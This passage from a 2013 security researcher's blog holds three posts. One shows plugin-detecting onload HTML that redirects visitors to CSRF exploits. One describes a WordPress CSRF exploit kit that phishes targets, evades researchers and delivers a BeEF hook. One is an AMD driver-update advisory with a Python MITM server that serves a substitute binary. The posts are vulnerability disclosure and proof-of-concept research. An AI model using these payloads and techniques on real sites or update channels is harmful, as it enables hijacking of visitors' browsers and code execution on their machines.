				Tagged <a href="https://charlieeriksen.github.io/tag/csrf/" rel="tag">CSRF</a>, <a href="https://charlieeriksen.github.io/tag/openvpn/" rel="tag">OpenVPN</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/#respond" title="Comment on CVE-2013-2692 &#8211; Or when your OpenVPN is a bit too open">Leave a comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-256 -->

				
					
<article id="post-249" class="post-249 post type-post status-publish format-standard hentry category-security tag-csrf">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/" title="10:23 pm" rel="bookmark" class="entry-date"><time datetime="2013-05-03T22:23:43+00:00" pubdate>May 3, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/" title="Permalink to Conditional CSRF &#8211; Or how to spray without praying" rel="bookmark">Conditional CSRF &#8211; Or how to spray without praying</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p>A part of the goal of my latest project, <a title="WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins" href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/" target="_blank">WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins</a>, was to show some novel techniques that I&#8217;ve been picking up on in terms of exploitation of web applications and delivering payloads in neat ways. One goal specifically was to deliver an array of different potential payloads depending on specific conditions and not spray and pray. The one that is the most obvious, is whether or not the target has a specific plugin installed. My approach ended up being a somewhat obscure but neat one that others have documented before. Specifically, the onload/onerror attribute on certain HTML elements that pull in outside resources. Lets deconstruct a landing page as you&#8217;d see it from the above project:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e78094d4884474893" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
&lt;image src="http://192.168.1.116/wordpress/wp-content/plugins/all-in-one-webmaster/images/fail.jpg" width="0" height="0"  onload="window.location = '/pi2Y4fcVY7fRHjo';"&gt;
&lt;script src="http://192.168.1.116/wordpress/wp-content/plugins/easy-adsense-lite/wz_tooltip.js" onload="window.location = '/105BTlRREjf4E4F';"&gt;&lt;/script&gt;
&lt;image src="http://192.168.1.116/wordpress/wp-content/plugins/wp-downloadmanager/images/drive.png" width="0" height="0"  onload="window.location = '/E36LAz5PgUlSDzt';"&gt;
&lt;image src="http://192.168.1.116/wordpress/wp-content/plugins/wp-print/images/print.gif" width="0" height="0"  onload="window.location = '/xQEMYQu2lOGPXAf';"&gt;</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e78094d4884474893-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78094d4884474893-2">2</div><div class="crayon-num" data-line="crayon-53c98e78094d4884474893-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78094d4884474893-4">4</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e78094d4884474893-1"><span class="crayon-o">&lt;</span><span class="crayon-e">image </span><span class="crayon-v">src</span><span class="crayon-o">=</span><span class="crayon-s">"http://192.168.1.116/wordpress/wp-content/plugins/all-in-one-webmaster/images/fail.jpg"</span><span class="crayon-h"> </span><span class="crayon-v">width</span><span class="crayon-o">=</span><span class="crayon-s">"0"</span><span class="crayon-h"> </span><span class="crayon-v">height</span><span class="crayon-o">=</span><span class="crayon-s">"0"</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-v">onload</span><span class="crayon-o">=</span><span class="crayon-s">"window.location = '/pi2Y4fcVY7fRHjo';"</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78094d4884474893-2"><span class="crayon-ta">&lt;script </span><span class="crayon-e ">src</span><span class="crayon-o">=</span><span class="crayon-s">"http://192.168.1.116/wordpress/wp-content/plugins/easy-adsense-lite/wz_tooltip.js"</span><span class="crayon-h"> </span><span class="crayon-e ">onload</span><span class="crayon-o">=</span><span class="crayon-s">"window.location = '/105BTlRREjf4E4F';"</span><span class="crayon-o">&gt;</span><span class="crayon-ta">&lt;/script&gt;</span></div><div class="crayon-line" id="crayon-53c98e78094d4884474893-3"><span class="crayon-o">&lt;</span><span class="crayon-e">image </span><span class="crayon-v">src</span><span class="crayon-o">=</span><span class="crayon-s">"http://192.168.1.116/wordpress/wp-content/plugins/wp-downloadmanager/images/drive.png"</span><span class="crayon-h"> </span><span class="crayon-v">width</span><span class="crayon-o">=</span><span class="crayon-s">"0"</span><span class="crayon-h"> </span><span class="crayon-v">height</span><span class="crayon-o">=</span><span class="crayon-s">"0"</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-v">onload</span><span class="crayon-o">=</span><span class="crayon-s">"window.location = '/E36LAz5PgUlSDzt';"</span><span class="crayon-o">&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78094d4884474893-4"><span class="crayon-o">&lt;</span><span class="crayon-e">image </span><span class="crayon-v">src</span><span class="crayon-o">=</span><span class="crayon-s">"http://192.168.1.116/wordpress/wp-content/plugins/wp-print/images/print.gif"</span><span class="crayon-h"> </span><span class="crayon-v">width</span><span class="crayon-o">=</span><span class="crayon-s">"0"</span><span class="crayon-h"> </span><span class="crayon-v">height</span><span class="crayon-o">=</span><span class="crayon-s">"0"</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-v">onload</span><span class="crayon-o">=</span><span class="crayon-s">"window.location = '/xQEMYQu2lOGPXAf';"</span><span class="crayon-o">&gt;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0055 seconds] -->
<p>What we can observe here is a bunch of different image/script tags all pointing to a potential file existing on a remote system which belong to a specific WordPress plugin. In the event that the plugin is not installed on the host, nothing happens. We&#8217;re not loading them for display as I&#8217;m sure you guessed. Rather, we&#8217;re hoping to get the onload attribute invoked, which contains some convenient javascript of ours.</p>
<p>In the event that the vulnerable plugin is detected, in this case we redirect to a page that contains our actual exploit payload. This means we don&#8217;t have to send all possible payloads at once, but can have some obscurity until we know we can hit something interesting. Or in other words, you can spray a target and not have to pray that your exploits work, because they won&#8217;t trigger unless a target has the plugin you&#8217;re targeting.</p>
<p>This approach is not new, as it has been used in the past for things like trying to resolve different host-names/ip/port ranges on an internal network through a hooked browser to scan for other web applications to target. In this case, we&#8217;re using this approach to detect the presence of a vulnerable plugin on a, granted that it&#8217;s a pre-determined, target. By being able to not have to do up-front poking at a running system, we&#8217;re able to achieve a lower turn-around time on delivering a payload that either hits a target or simply just does nothing.</p>
<p>So there you have it. This is probably not an useful approach to take in all cases where you exploit a CSRF vulnerability. But it&#8217;s still an interesting approach and hopefully will inspire others to consider thinking about being more sneaky(Don&#8217;t spray and pray!) in their exploitation attempts and make full use of the wonderful things HTML and javascript offer you!</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/csrf/" rel="tag">CSRF</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/#comments" title="Comment on Conditional CSRF &#8211; Or how to spray without praying">1 Comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-249 -->

				
					
<article id="post-238" class="post-238 post type-post status-publish format-standard hentry category-security">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/" title="4:03 pm" rel="bookmark" class="entry-date"><time datetime="2013-05-01T16:03:59+00:00" pubdate>May 1, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/" title="Permalink to WordPress CSRF Exploit kit &#8211; A novel approach to exploiting WordPress plugins" rel="bookmark">WordPress CSRF Exploit kit &#8211; A novel approach to exploiting WordPress plugins</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p>Over the last few weeks I&#8217;ve been on roll with finding CSRF vulnerabilities in WordPress plugins. That&#8217;s all nice and good, but when you&#8217;ve got 30 of them, it&#8217;s a shame to not take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine, and most importantly to hopefully inspire others to think along these lines. This project is solely meant for educational purposes, not attack against running services or people.</p>
<p><a href="https://github.com/CharlieEriksen/WP-CSRF-POC">https://github.com/CharlieEriksen/WP-CSRF-POC</a></p>
<p>The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out:</p>
<ul>
<li>It&#8217;s not designed to simply spray and pray. You define the target URLs you want to hit and then you have an unique URL for each blog you can go phishing with.</li>
<li>Then it will use the onload function of an img or script tag to detect the presence of the vulnerable plugin on the target blog on request through the unique URL pre-defined</li>
<li>We generate the payload on request with an uniquely identifying URL to ensure it&#8217;s not easy to extract the exploits.</li>
<li>You get max 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back. Makes it harder for researchers life</li>
<li>We deliver a <a href="http://beefproject.com/">beef hook</a>. Because beef is cool and god damn tasty</li>
</ul>
<p>I want to stress especially the &#8220;novel&#8221; use of the onload function of img/script tags. People in the past have used it to detect the presence of different host-names/&#8221;port scanning&#8221; internal systems by vectoring through a hooked browser. I say that&#8217;s cool and all, but you can take that further and use it to detect the presence of a plugin on a target on demand, making you able to be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script.</p>
<p>A normal series of events would be:</p>
<ol type="1">
<li><span style="line-height: 13px;">An attacker sets up this script with pre-defined targets(targets variable) with an unique URL for each target blog</span></li>
<li>The attacker then spams out a link to the running script with the unique URL for each target blog</li>
<li>When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL</li>
<li>The script the generates a random URL for each exploit we have with the target blog URL put in that can then be requested</li>
<li>We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog</li>
<li>If none of the plugins are detected on the blog, we redirect to google</li>
<li>If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4</li>
<li>The exploit is now written out to the user, submitting the CSRF with a XSS payload pointing to our beef instance</li>
<li>We now delete all cached exploits made for the requesting IP</li>
</ol>
<p>There&#8217;s a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much much dirtier, and not the goal of this proof of concept. I urge anybody who finds the concept to be useful to run with it if they so desire. I&#8217;ll be adding more exploits as advisories are published. Otherwise, I&#8217;m curious to hear people&#8217;s thoughts on this.</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a>			</span>
			<span class="sep"> / </span>			
						
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/#comments" title="Comment on WordPress CSRF Exploit kit &#8211; A novel approach to exploiting WordPress plugins">1 Comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-238 -->

				
					
<article id="post-228" class="post-228 post type-post status-publish format-standard hentry category-advisories tag-amd">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/" title="2:09 pm" rel="bookmark" class="entry-date"><time datetime="2013-03-17T14:09:23+00:00" pubdate>March 17, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/" title="Permalink to AMD Catalyst driver update vulnerability" rel="bookmark">AMD Catalyst driver update vulnerability</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p><strong>Description of vulnerability</strong></p>
<p>The AMD Catalyst driver auto update feature enables users to automatically update the AMD Catalyst driver on their machine through a single click when the driver determines that it is out of date.</p>
<p>However a vulnerability exists in this mechanism as a result of:</p>
<ol>
<li>The download URL and binary download is done over HTTP</li>
<li>The binary is not verified as having been signed by AMD before execution</li>
</ol>
<p>This means that a MITM can intercept the requests to the AMD support site and redirect the auto-update feature to download and execute a binary of the attacker&#8217;s choice without the user knowing any better when they decide to auto-update.</p>
<p><strong>Proof of concept</strong></p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7809981845412747" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">Python</span></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
import SimpleHTTPServer
import SocketServer

xml = """&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;list&gt;
    &lt;Catalyst-Driver-Files&gt;
        &lt;Title&gt;Catalyst Software Suite with .NET 4 Support&lt;/Title&gt;
        &lt;DriverCategory&gt;Full Catalyst Software Suite (Recommended)&lt;/DriverCategory&gt;
        &lt;DriverLanguage&gt;;#All;#&lt;/DriverLanguage&gt;
        &lt;DriverProductType&gt;;#1-Radeon;#3-Integrated;#18-AIW_HD;#&lt;/DriverProductType&gt;
        &lt;FileSize&gt;184 MB&lt;/FileSize&gt;
        &lt;OSType&gt;;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#&lt;/OSType&gt;
        &lt;ReleaseDate&gt;2012-10-22T00:00:00-05:00&lt;/ReleaseDate&gt;
        &lt;RevisionNumber&gt;12.42&lt;/RevisionNumber&gt;
        &lt;RollupSortOrder&gt;15&lt;/RollupSortOrder&gt;
        &lt;TextMultiple1&gt;
        &lt;/TextMultiple1&gt;
        &lt;TextSingle1&gt;http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe&lt;/TextSingle1&gt;
        &lt;TechDownloadGPUSubtype&gt;Driver&lt;/TechDownloadGPUSubtype&gt;
        &lt;ContentType&gt;GraphicsDriverFile&lt;/ContentType&gt;
        &lt;DriverVersionSupported&gt;;#12.42;#&lt;/DriverVersionSupported&gt;
        &lt;ID&gt;956&lt;/ID&gt;
        &lt;Modified&gt;2012-10-22T21:30:52-05:00&lt;/Modified&gt;
        &lt;Created&gt;2012-10-22T21:30:52-05:00&lt;/Created&gt;
        &lt;Author&gt;System Account&lt;/Author&gt;
        &lt;Editor&gt;System Account&lt;/Editor&gt;
        &lt;_UIVersionString&gt;1.0&lt;/_UIVersionString&gt;
        &lt;Attachments&gt;0&lt;/Attachments&gt;
        &lt;TitleCN&gt;Catalyst Software Suite&lt;/TitleCN&gt;
        &lt;TitleBR&gt;Catalyst Software Suite&lt;/TitleBR&gt;
        &lt;TitleDE&gt;Catalyst Software Suite&lt;/TitleDE&gt;
        &lt;TitleFR&gt;Catalyst Software Suite&lt;/TitleFR&gt;
        &lt;TitleIT&gt;Catalyst Software Suite&lt;/TitleIT&gt;
        &lt;TitleLA&gt;Catalyst Software Suite&lt;/TitleLA&gt;
        &lt;DescriptionCN&gt;
        &lt;/DescriptionCN&gt;
        &lt;DescriptionBR&gt;
        &lt;/DescriptionBR&gt;
        &lt;DescriptionDE&gt;
        &lt;/DescriptionDE&gt;
        &lt;DescriptionFR&gt;
        &lt;/DescriptionFR&gt;
        &lt;DescriptionIT&gt;
        &lt;/DescriptionIT&gt;
        &lt;DescriptionLA&gt;
        &lt;/DescriptionLA&gt;
        &lt;TitleKR&gt;(Catalyst Software Suite)&lt;/TitleKR&gt;
        &lt;DescriptionKR&gt;
        &lt;/DescriptionKR&gt;
        &lt;LinkTitleNoMenu&gt;Catalyst Software Suite with .NET 4 Support&lt;/LinkTitleNoMenu&gt;
        &lt;LinkTitle&gt;Catalyst Software Suite with .NET 4 Support&lt;/LinkTitle&gt;
    &lt;/Catalyst-Driver-Files&gt;
&lt;/list&gt;
"""

class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        if "catalystxml" in self.path:
            self.send_response(200)
            self.send_header('Content-type','text/xml')
            self.end_headers()
            self.wfile.write(xml) 
            return
        elif ".exe" in self.path:
            self.send_response(200)
            self.send_header('Content-type','application/octet-stream')
            self.end_headers()
            f = open(r"C:\Windows\System32\calc.exe", "rb")
            self.wfile.write(f.read())
            f.close()
            return

httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7809981845412747-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-2">2</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-4">4</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-6">6</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-8">8</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-10">10</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-12">12</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-14">14</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-16">16</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-18">18</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-20">20</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-21">21</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-22">22</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-23">23</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-24">24</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-25">25</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-26">26</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-27">27</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-28">28</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-29">29</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-30">30</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-31">31</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-32">32</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-33">33</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-34">34</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-35">35</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-36">36</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-37">37</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-38">38</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-39">39</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-40">40</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-41">41</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-42">42</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-43">43</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-44">44</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-45">45</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-46">46</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-47">47</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-48">48</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-49">49</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-50">50</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-51">51</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-52">52</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-53">53</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-54">54</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-55">55</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-56">56</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-57">57</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-58">58</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-59">59</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-60">60</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-61">61</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-62">62</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-63">63</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-64">64</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-65">65</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-66">66</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-67">67</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-68">68</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-69">69</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-70">70</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-71">71</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-72">72</div><div class="crayon-num" data-line="crayon-53c98e7809981845412747-73">73</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809981845412747-74">74</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809981845412747-1"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">SimpleHTTPServer</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-2"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">SocketServer</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-3">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-4"><span class="crayon-k ">xml</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-s">"""<span class="crayon-ta">&lt;?</span><span class="crayon-e">xml </span><span class="crayon-i">version</span><span class="crayon-o">=</span><span class="crayon-s">"1.0"</span><span class="crayon-h"> </span><span class="crayon-i">encoding</span><span class="crayon-o">=</span><span class="crayon-s">"utf-8"</span><span class="crayon-ta">?&gt;</span></span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-5"><span class="crayon-s">&lt;list&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-6"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&lt;Catalyst-Driver-Files&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-7"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;Title&gt;Catalyst Software Suite with .NET 4 Support&lt;/Title&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-8"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DriverCategory&gt;Full Catalyst Software Suite (Recommended)&lt;/DriverCategory&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-9"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DriverLanguage&gt;;#All;#&lt;/DriverLanguage&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-10"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DriverProductType&gt;;#1-Radeon;#3-Integrated;#18-AIW_HD;#&lt;/DriverProductType&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-11"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;FileSize&gt;184 MB&lt;/FileSize&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-12"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;OSType&gt;;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#&lt;/OSType&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-13"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ReleaseDate&gt;2012-10-22T00:00:00-05:00&lt;/ReleaseDate&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-14"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;RevisionNumber&gt;12.42&lt;/RevisionNumber&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-15"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;RollupSortOrder&gt;15&lt;/RollupSortOrder&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-16"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TextMultiple1&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-17"><span 